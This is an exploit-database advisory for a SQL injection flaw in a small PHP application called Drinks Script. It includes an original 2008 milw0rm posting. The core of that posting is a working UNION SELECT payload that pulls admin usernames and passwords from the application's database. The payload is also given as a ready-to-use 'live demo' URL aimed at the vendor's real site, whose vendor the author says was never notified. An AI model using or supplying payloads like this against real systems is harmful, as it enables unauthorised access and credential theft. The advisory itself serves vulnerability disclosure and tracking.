Drinks Script

vendor:

Drinks Script

by:

x.s7acy

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Drinks Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

The Drinks Script is vulnerable to a SQL injection attack. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This request contains malicious SQL statements that are executed in the backend database. This can allow an attacker to gain access to sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

===========================================
Drinks script.
--------------------------------------------------------------------------------------
Vendor:     http://www.fivedollarscripts.com
Demo:       http://www.fivedollarscripts.com/drinks/index.php
Notified:     No. Probably don't care.
Price:        Five bones.
============================================

Exploit:
/path/index.php?cmd=6&recid=null union all select
1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
drinksadmin--

Live Demo:
http://www.fivedollarscripts.com/drinks/index.php?cmd=6&recid=null
union all select
1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
drinksadmin--

contact: x.s7acy at gmail dot com
greetings to bobthejanitor, mason, that new president guy, and the rest.
first script blah blah blah
=============================================

# milw0rm.com [2008-11-05]